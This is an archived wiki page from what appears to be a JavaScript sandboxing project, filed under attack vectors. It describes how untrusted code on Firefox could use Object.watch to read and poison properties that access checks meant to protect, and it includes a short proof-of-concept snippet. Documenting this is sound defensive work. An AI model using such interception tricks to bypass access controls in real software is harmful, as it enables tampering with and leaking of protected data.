This repository has been archived by the owner on Feb 2, 2021. It is now read-only.
ObjectWatch
Kevin Reid edited this page Apr 16, 2015
·
1 revision
(legacy summary: watch and unwatch intercept gets and sets to object properties) (legacy labels: Attack-Vector)
If static or runtime checks prevent access to certain properties, then on Firefox, malicious code can still access those properties by using Object.watch.
http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Objects:Object:watch defines Object.watch as a property of all javascript Objects that allows a client to watch a particular property of a particular Object and receive notifications when it changes, and possible modify the value set.
Object.watch is callable by client code.
Firefox and possibly others. Not IE.
// Untrusted code need never access private directly to observe and
// modify private fields of a mutable object
function untrusted(o) {
o.watch(
'private_',
function (obj, oldval, newval) {
alert('untrusted got oldval ' + oldval + ' and newval ' + newval);
return 'poisoned'; // substitute a bogus value
});
}
// Trusted code
var o = { private_: 'old' };
untrusted(o);
o.private_ = 'new';
alert('private is now ' + o.private_);